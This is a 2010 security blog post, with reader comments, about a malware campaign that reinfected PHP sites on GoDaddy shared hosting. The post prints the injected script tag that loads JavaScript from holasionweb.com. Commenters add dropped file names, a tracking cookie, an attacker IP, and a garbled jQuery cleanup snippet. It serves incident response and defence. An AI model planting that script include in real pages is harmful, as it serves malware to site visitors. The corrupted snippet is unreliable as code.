Lots of sites reinfected – Now using holasionweb.com

Update2: Reply from GoDaddy: https://blog.sucuri.net/2010/05/reply-from-godaddy-regarding-latest.html

Update: Code used to exploit found: https://blog.sucuri.net/2010/05/found-code-used-to-inject-malware-at.html

We just got reports this morning of hundreds of sites getting reinfected at GoDaddy (shared servers). This is the new javascript being added to the sites:

< script src =”http://holasionweb.com/oo.php”>< /script>

The changes were all made this morning between 2am and 3am, changing all PHP files with this new code.

All the sites we checked so far were updated (WordPress 2.9.2) and using good permissions. Plus. not all of them were using WordPress. I don’t want to see the “users were not updated” excuse again, please. GoDaddy, any ideas to what is going on?

Note that our previous solution will still clean it up: https://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html

The details are all the same from the previous attack, just using a new host (and new victims):

https://blog.sucuri.net/2010/05/new-attack-today-against-wordpress.html
http://sucuri.net/malware/entry/MW:MROBH:1

Notice that this is not related to one specific platform. Most of the sites we checked were using WordPress, but some were on Joomla or using other web applications. Plus, very annoying since all the PHP files get modified.

As always, if you are having difficulties getting your site cleanup, send us an email at contact@sucuri.net or visit our site: http://sucuri.net. We can get your sites clean up right away.

Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if it ever gets infected with malware, hacked or blacklisted.

89 comments
  1. Thanks this worked!

    I made a mistake with godaddy because I did in file manager a file restore to last week without backing up my latest posts in wordpress. I didn't think it would revert the posts back and it didn't at first, but now the posts are gone since the last time I did a restore when this happened already. i reverted back to yesterday now and the post never showed up. Any ideas what happened??

  2. Hello,
    my website (wordpress 2.9.2, hosted on godaddy) was infected by this worm too.

    Everybody submit a solution to clean up the website, but nobody submit a FIX, or the origin of the vulnerabilty !

    We dont know if it's a Godaddy Vulnerability, or a WordPress Vulnerability.

    Why nobody try to find the vulnerability origin ?

    Sorry for my english.

    M.

  3. Oops, i've put my email in the wrong input.
    Can you modify my email to name please ?

    Thx.

  4. I found the javascript in my theme's footer.php but don't see it any other php files I've checked. I tried running the script to cleanup the site (in case I missed something) but because bluehost deactivated my sites, I can't get the script to work. How does one run it on a deactivated website?

  5. Thanks again. My sites seemed to become reinfected. My host, a front for GD have just had another email from me.

    I'm close to moving to another provider.

  6. we got hacked too.. on shared godaddy hosting.. but we didnt have any wordpress on our site in particular. we did have sugarcrm (the only new addition in the last week)..

    your script worked, thanks

  7. Once again, thank you so much guys. You have been infinitely more helpful than GoDaddy. I am becoming an extremely unhappy customer. PHPBB3 hacked again last night. Your fix worked again this morning.

  8. For what it's worth, there were two sites that I maintain for a client on GoDaddy that were infected last week. As ridiculous, unlikely and nonsensical as GoDaddy's "explanations" were, they implied the site was infected because there was an old WP installation hanging around that wasn't being used. I thought that particular site (which was for an old blog that my client wasn't using anymore) was in the root directory, therefore a completely different directory tree from the other sites, but actually it was just in a subfolder in the main site's folder. Since I deleted that folder, we haven't gotten reinfected. I don't believe that this could be the case for everyone, but it does seem to lend some amount of credibility to the "outdated WordPress" theory GoDaddy's going with…

  9. Infected this morning. Absolutely no wordpress or any other prepackaged app in our folders. Only php and html files.

  10. My site is in php and was also infected….I lost around 300$ in revenue this morning $%#%$#%

    I will change my hosting compagny at the end of the month….

  11. Happened to every PHP file on my shared GoDaddy hosting both this time and last time. On my hosting I have SMF 1.1.11 and phpMyAdmin (most current version) so this corroborates your earlier post with it being a vulnerability in phpMyAdmin. I of course contacted GoDaddy and they gave me the usual garbage about my responsibility to keep scripts up to date and how to notice malware. Completely useless. However, I just restored everything from a backup I had a few days ago and all is well, for now…

  12. O, I forgot in my last post to mention that I don't get redirected by the javascript, only my users do. So my speculation is:

    Script is injected through a vulnerability somewhere (possibly phpMyAdmin)

    When a user visits an infected page, the script checks for a leftover phpMyAdmin cookie. If this cookie exists, then the script assumes that this person is an admin for the site and hence doesn't redirect them so they don't suspect anything is wrong.

    If the cookie is not set, this person must be a regular visitor of the site so redirect them.

    Just my speculation.

  13. Go Daddy wants 150 bucks from me to use a backup of their database to get a week's worth of postings. Unreal! Does anyone recommend a good hosting company? I might be willing to do dedicated hosting this time, just to not put up with shared hosting anymore.

  14. I've made a temporary solution, to fast clean up client-side, the malicious script.

    This script need jQuery.

    // Execute the script a first time
    findMaliciousScript = $("body").find("script").attr('src','http://holasionweb.com/oo.php&#39;);
    $(findMaliciousScript).removeAttr("src");

    function launchTimer() {
    timer = setInterval(loop, 0);
    }
    function clearTimer() {
    clearInterval(timer);
    }
    function loop() {
    findMaliciousScript = $("body").find("script");
    if (findMaliciousScript.attr('src') == 'http://holasionweb.com/oo.php&#39šŸ˜‰ {
    $(findMaliciousScript).removeAttr("src");
    findMaliciousScript = '';
    }
    else {
    clearTimer();
    }
    };

    // And loop it, the loop stop when the src is deleted.
    launchTimer();

  15. I paid the $150 once, now I back up sorta regularly.

    But seriously though GoDaddy are playing with fire here cause many people are surely considering another host.

    Maybe Dreamhost should make us an offer.

    You know what, I think I'll write them.

  16. Happened to over 2,000 of my PHP files this morning…. and the Web Fix worked like a charm.

    LIFE SAVER! Thank you so much!

    I do have an old install of WP on my site too… upgrading as I type. F GoDaddy in the A.

  17. @rvtraveller you are absolutely spot on right with the PMA cookie tracker.
    The script drops a cookie named "pma_visited_theme1", with a value of "1" (in the sites I've seen so far anyways).

    Many of the sites i'm managing (of course on GoDaddy) do run wordpress, but the majority of them don't, so I suspect this is systemic of the shared server environment. A vulnerability thru PMA would make sense, since a compromised PMA in a given cluster would expose those sites stored in the same cluster.

    GoDaddy at this point is rivaling BP, Haliburton, and TransOcean(?) for the top spot in fingerpointing…

    I highly recommend migrating away from GoDaddy, not only b/c of this security problem, but b/c there Customer Service has reached epic f@il levels.

    -C

  18. Question, how long did the script run for you guys.

    Mine took like 10 seconds and I wonder how it could have cleaned so many php files that quickly

  19. @Bourgy.com yeah i have back up from last week, but didn't think by doing their restore it would overwrite the database changes too, just the actual files. I just installed wordpress db backup to have emailed me everyday. then it's off to find a new hosting company!

  20. After I cleaned up some of my files, bluehost reactivated my site. I ran the fixer script and everything seems to be working fine now. Will continue cleaning out old plugins and themes.

  21. My WordPress 2.9.2 site hosted at GoDaddy has been the victim of both of the most recent hacks. The listed fix you developed worked like a charm.

    When GoDaddy was sent a trouble ticket this morning to let them know about our incredible displeasure at their response to date, this is an exact copy of the key part of their response to me.

    GoDaddy's response begins;

    Thank you for contacting Online Support.

    Our Security Operations Center (SOC) is aware of the attacks and has been working with leading WordPress security experts to identify the root cause of the issue. We provide the shared hosting server to you in a clean, uninfected state, and we have security measures in place and anti-virus software installed to ensure the integrity of our hosting accounts. Please note that our SOC found that these attacks have occurred as a result of security vulnerabilities in older versions of WordPress installations on customer hosting accounts. A member of our Security team recently addressed the issue at a teleseminar. You may find more information, including the audio replay of the teleseminar, at the below link:

    http://www.wpsecuritylock.com/cechriecom-com-script-wordpress-hacked-on-godaddy-case-study/

    We recommend you update your WordPress installation to 2.9.2 to eliminate the security vulnerabilities existing in prior WordPress versions. There are several steps to upgrading your WordPressĀ® installation.

    End copy of their email response to me.

    I want to say again, we ARE running the latest WordPress 2.9.2 on our site. Right now. I'm looking at the dashboard.

    GoDaddy's response to me is to blame an old WordPress version, when they are currently hosting the latest one for me right now. They didn't even bother checking what version I am using that got hacked before telling me that it is, in effect, my fault or WordPresses fault, but not theirs.

  22. @Bourgy – let me ask, What do your stats look like for SE referrers? I ask that b/c if compromised sites all have the same IP Address attached to it, then SEs like Google will take notice of said-exploit attached to the IP Address of these sites and throttle back ranking to limit searcher exposure (not to mention attach a "Malicious Website" notice to the site's SE Listing). At that point it's less GoDaddy taking your site down and hence limiting your traffic and more a negative SEO component. For others hurt similarly and not having been hacked, It's the good ole "One Bad Apple" effect.

  23. My email to them instructed not to bother with nonsensical reply asking me to update wordpress. This what they sent me:

    Dear Sir or Madam,

    Thank you for contacting Online Support. While there are no ways to ensure that any site is 100% safe from malicious intended attacks. Not only do we constantly strive to combat these attacks, we ask our customers to be vigilante as well to help in this struggle. Other than the remedies offered previously we have no new information or ways to correct these issues. We appreciate your understanding in this matter.

  24. BC I usually have 2000 SE referees at this time. It's around 800 so far.

    I am not sure about a Google penalty because I actually refreshed my site at the exact moment the attack occurred. Unless the penalty is from a previous attack that's only now taken effect

  25. My website is hosted at Godaddy but is not a WordPress site, my site is programmed in PHP and is a site of own authorship.

    I applied a solution I found in your site and which has been very useful, in spite of that, as I said before, my site is not done in WordPress (http://sucuri.net/malware/helpers/wordpress -fix_php.txt)

    With the source code that you have used to cure the infection of php files, can use the same approach to infect?

    I ask this because if so it is not surprising that a simple php file, placed in the root folder of an FTP user with privileges higher than many other FTP users, can infect all files under your tree.

    Sorry if my English is a bit poor, but the message was fully translated with Google Translator.

    Thanks for the input of your blog.

  26. Seriously, I'm sick of Godaddy's bullshit, all of my wordpress installs were fully upgraded and yet we've still been hacked twice. It's obviously a security issue with their server. I'm switching if possible. (Don't know how to move a large database) šŸ™

  27. I too was hacked. GoDaddy shared hosting. I have hand coded PHP and commercial PHP scripts.

    While you script seems to have removed the malware, Zen Cart, phpMyDirectory and Post Affiliate Pro are a little broken at the moment.

  28. Your wordpress-fix.php script removes the code but it also left a single blank line of text at the top of every file giving me "headers already sent" errors all over the place.

    A fix coming soon for that?

  29. Hacked Again. Had a backup and it took me 20 minutes. Then I ran the script just in case. The script was hidden in the wp-footer. I want out of godaddy but I am scared to not do the transition correctly

  30. i have the same problem, wordpress-fix.php script leaves a blank line at the top of every file. Is there a fix?

  31. My websites were hacked the second time today (most recent versions, GoDaddy). To prevent visitors from infection in the future I made a cron job to run wordpress-fix.php twice an hour

  32. my ftp hacked too
    infected more than 30000 php files on my sites
    i got to write php script to clear all my files

    this is russian hacker
    we need to find partner program of this virus
    only then we can stop this shit

  33. I've been hacked 4x in 5 days on two different GoDaddy hosting accounts. I signed up for Sucuri Security and ran a scan. It said I had malware in the cgi-bin/php.ini and that I needed to delete it. But it said that this has been a problem over at Network Solutions, not GoDaddy. I didn't have a cgi-bin folder in my hosting account, so called GoDaddy customer service. She put me on hold for a few minutes and came back saying they ran some scan and yes, there is a big problem there that they'll need to look into. We (as users) don't have access to the cgi-bin folder…only they do – so they were going to "escalate it" and look into how someone got into that folder to plant that php.ini file in there. This would explain why the problem keeps showing up on my GoDaddy account almost every day, even tho I clean it off and why the "quick fix" didn't work for me — it must not be able to get into the cgi-bin folder when it's at GoDaddy??

    If you are on GoDaddy and keep cleaning your site and it keeps coming back: Call GoDaddy and tell them you understand the malware is residing in the cgi-bin folder (which the customer service girl didn't even know existed, by the way) and since you don't have access to it, they need to run their scan and see that this is where the problem is!!

  34. WPsecuritylock updates: It is going worldwide and spreading to other hosting companies. DAMNG IT!

  35. I'm really getting p!ssed that GoDaddy is suggesting that it is just sites that weren't updated. All my sites were running WP 2.9.2, and four were hacked!!!

  36. To GoDaddy.com:

    I've filled out your form TWICE and have gotten no response either time. Just an email confirmation that I filled out the form!

    This is ridiculous!

  37. I filled out the form twice and NOTHING. I had to call only to get clueless reps on the phone who didn't know a damn thing

  38. After 2 weeks of attacks on my GoDaddy hosted WordPress and Drupal sites, I know perfectly well how to CURE the problem.

    But up to now, I have not seen any report on how to PREVENT the problem.

    Any ideas anyone? I am tired of cleaning up my sites…!

  39. Yeah, GoDaddy's pretty useless. They obviously don't know what's going on, that's why they keep playing the "it's your fault, it's wordpress' fault" game.

    Thanks for the script. Glad someone's trying to help solve this problem. I've been hacked three times in the last month. Cleaned up all my files, up to date on WP, and have complex passwords but I still keep getting hit. GoDaddy's response each time is to send me form responses that don't help me at all.

  40. When I run the script I don't get that cgi bin message. And the script only runs like 15 seconds.

    Can someone tell me of their experience with the script (length of time it runs, etc, messages) because I'm having doubts the script worked for me

  41. Peter, I belive the problem is with godaddy themselves, And its a problem they need to fix, everybody should email them and tell them its THERE FAULT.

    I dont see how you can prevent a problem as the heirachy for control is out of our hands.

    I belive that, As all these sites are hosted on Shared servers, There is a problem somewhere that is allowing user(s) to control the whole server and not just there allocated space on the server, Therefore giving them control of everybodie(s) site(s) instead of just there own.

  42. GODADDY!!!! STOP PLAYING THE PR GAME and FIX THIS!!!! I'm tire of the run around, the hacks, and the endless clean ups.

  43. My Joomla site (1.5.16) was infected. It is hosted on a shared Linux server through GoDaddy.

    I used the fix and everything seems to work. This happened before (over the weekend) and I simply uploaded a backup of the website which worked temporarily.

    GoDaddy is trying to tell me that I am an isolated incident, but reading the comments here leads me to believe that we're all suffering the same problem and it's not all our fault.

    I'm not entirely sure everything is fixed yet because the Sucuri Web-based Integrity Monitoring system says that I am still infected (though it says the last check was 4 hours ago, so I'll wait until that updates before freaking out).

    Thanks for posting this fix. I'll be back if there are any future attacks.

  44. Hey, Go Daddy! You know what I find ironic? When I try to post a comment to your BS blog post about keeping our version of WP up-to-date, I get a 500 error!

  45. @Lisa: I notified this to Godaddy. they answered:

    "We're investigating that. If you get an error trying to register for the Community, please refresh the page after it errors out."

    Peter

  46. This has been the third time in the last two months all our php files on GoDaddy have been hit with this.

  47. I'm on a linux shared hosting on GoDaddy and have been attacked 3x now including the this last one.

    For those of you who have access to your history, please check to see if there are any unusual files that was "deleted" from your root directory on 5/11. I found one on 5/11 at 9:00pm. I still had access to it even when it was deleted and saw that this was the malware code in php. It was named him_vivie.php

    Anyway it was deposited then deleted. So you won't find it if you look at your present directory.

    My FTP logs does not show any intrusion from FTP during that time. So this has got to be a server issue.

  48. GoDaddy customer here. I've had two sites infected twice each in the last week. I noticed that when I went to update the wordpress authentication keys, they were missing from the wp-config.php file. They're in the backup file but the file on the GoDaddy server had the auth keys missing.

    Is it possible that the hack removes the auth keys and that's why site are getting re-infected so quickly?

  49. Can anyone please recommend a good SECURE and solid, and relatively inexpensive alternative hosting company?

    And how hard is it to switch?

    Thanks!!

  50. @rvtraveller and -C,

    If it's a potential vulnerability with phpMyAdmin on GoDaddy, what if anything can we do to protect our sites?

    Not use phpMyAdmin, delete all cookies, anything? Thanks very much.

  51. Godaddy Customers,

    You can get infected from your own sites. Everyone needs to be doing at least one, and preferably two, antivirus and antispyware scans on their local computers, using two different scanners you don't normally use, to find threats that got past the AV scanner you were using. Some free scanners are at: Trend Micro Housecall, Kaspersky, Malwarebytes, Symantec (Norton), BitDefender, Windows Live OneCare, Computer Associates, McAfee, F-Secure.

    Do it.

  52. What's the difference in price for GoDaddy's dedicated hosting vs. shared hosting? $30 per month instead of $30 per year?

    Seems these viruses would be a great way for GoDaddy to get people to switch to dedicated hosting in order to make more money.

    …..i'm just sayin……

    The sad thing is, they might not lose customers because of this malware issue, but they WILL lose customers because of their "it's not us- it's you" responses/attitude toward it.

  53. I had the latest copy of wordpress, had an htaccess file to only allow ip access to the wpadmin folder. installed exploit scanner, wp-security admin, and wp firewall. Also changed permissions on the wp-config file to 700. Got hacked anyway.

    I left the site down while moving it to a new host by renaming the wordpress directory to "wordpressxyz" and just using html files with "site under maintenance".

    I'm glad I did – all php pages infected AGAIN – and this while wordpress is not available.

    I can't believe godaddy cannot figure out what is going on.

  54. I should also qualify my statement above by saying that I've read that it's not just GoDaddy hosted sites that are getting infected. Other hosts are having the same issue too, so everyone considering jumping ship would do best to wait, lest they move the whole thing and it happens all over again.

    My (GoDaddy hosted) blog has been hacked twice in the past week, and like many people above, I tried *everything* to fix it. The only thing that worked, ironically comes from GoDaddy themselves, and that's a restore to history in the hosting control panel. I got infected again this morning and I did this, and only this, and it worked like a charm. I only hope it will continue to work for every new time this happens. I better clear my schedule every day to work on this!!

    You can read more about the restore to history process on my blog here, which details it for even tech-dunces like me. šŸ™‚

    http://www.cowbellyblog.com/2010/05/12/the-best-way-to-remove-malware-from-a-wordpress-blog-using-godaddy/

  55. Thanks for the idea of scheduling the fix php script via cron – got it running hourly now.

    Interestingly, after my site was impacted I changed my WP, GoDaddy, and FTP passwords. They are not easy to guess and would take a considerable amount of time to hack, so I'm fairly certain at this point that the issue is not simply WP and it's certainly not a password brute force attack…

  56. Fuck you GoDaddy!
    Second attack in the last 12 days.

    Thank you very much $&%&%%&$(/Ā·"!

  57. I also see the PHP infection file in my GoDaddy backup from 5/11/2010 with a "Date Modified" of 5/11/2010 9:31:34 pm. The file was named kinsley_hershel.php and was deleted. (I would assume it was deleted after it ran and infected EVERY PHP file again.

  58. As far as I can see my site hasn't been infected (luckily) but it is running so so slowly – is that just a knock-on effect of being on Godaddy shared hosting and maybe other users on my server are infected? It's so frustrating.

  59. Can we have an instruction on hos to run a cron job?

    I see we can do it with GoDaddy but I don't know what to enter, script wise.

  60. What version of php is this happening with?

    Some of the hosting companies listed above still have older versions of php as the default for many of their customers.

  61. My drupal hosted on godaddy has been infected too. Twice. I cleaned manually the code and I'm waiting.

  62. My drupal 5.2 has been hacked. Restored all files, but didn't work. Could this be in the database? I even went into the theme's page.tbl.php and inserted text just below the last body tag… but the exploited malware script still showed between my text and the last body tag. This appears to be an infection of PHP itself and not Drupal. I have 6 WP sites as well and they've all been hacked several times. Even 1 WP site which is not viewable to the web (a playground) and it was hacked. Even php files I wrote myself outside of any WP site and they were hacked. I'm a veteran software engineer and seriously believe this to be a big time flaw with GoDaddy security. Any new news on the Drupal Hack? I've set all my WP directories even for the admin to no 'Write' permissions. So, if they hack my WP sites, they are using some other account than my administrative account. Hmmm Godaddy, what you say about that?

  63. Thank you, sucuri.net! You've helped us recover very quickly from this crud. It automatically infects IE 8! Terrific. Even older versions of Mozilla are relatively safe.

    In our case I think the initial drop file was called "1ndex.php".

  64. Also got attacked twice in the last week with PHP pages (no CMS). Godady gave me a canned response saying it's my fault.

  65. Correction to the above; not "1ndex.php", but rather we were affected by a file "she_elijah.php" that was deleted after 9 PM on 5/11/2010, by GoDaddy File Manager time. We're not WordPress. If anyone figures out how these were dropped, PLEASE post it.

  66. Guys, I downloaded my logs — here's the IP address of the machine executing the dropped PHP file on my site.

    188.165.200.96

    France. Who'd have thought. Going back to 5/10 I do NOT see any other hit from that IP address OR regarding that file! So the file was not dropped via http ?

    188.165.200.96 – – [12/May/2010:04:xx:xx -0700] "GET http://www.mysite.example.com/she_elijah.php HTTP/1.1" 200 60 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

    I hope this helps!

  67. I have seen a lot of WP cleaners, but nothing for Drupal yet. I have 2 infected drupal sites which are hosted on GoDaddy. I see the <"http://holasionweb.com/oo.php"> malicious script below my footer in both sites. I've searched in all my .php files and the code is not in those files. I will submit a ticket to godaddy, though we'll see what happens. Also, interesting thought is that I have 2 other sites that are drupal sites through GoDaddy, and thery not affected yet. Only thing I have actually updated recently is adding Google Adword Image codes (uses their .js and flash images). Doubt there is a connection, but I am looking at every possible angle.

  68. @seth

    The WP cleaners work for Drupal also as the infection is identical… My Drupal site got infected the same way as my WP sites got infected.

    You might have to add
    set_time_limit(0);

    at the start of the script, though, as otherwise it might timeout before the cleaning is finished.

    Peter

  69. i can find that there is a script from holasionweb at the end of source code of my website but i can not locate it either in footer.php or have checked other php files randomly but not found…….how can i find that where is it located?

  70. Just had my GoDaddy hosted WordPress site hacked again as of 2:17pm pst. Please be aware that there is a new wave of attacks going on. I just ran the repair script and all seems ok…. reporting to GoDaddy right now.

Comments are closed.

You May Also Like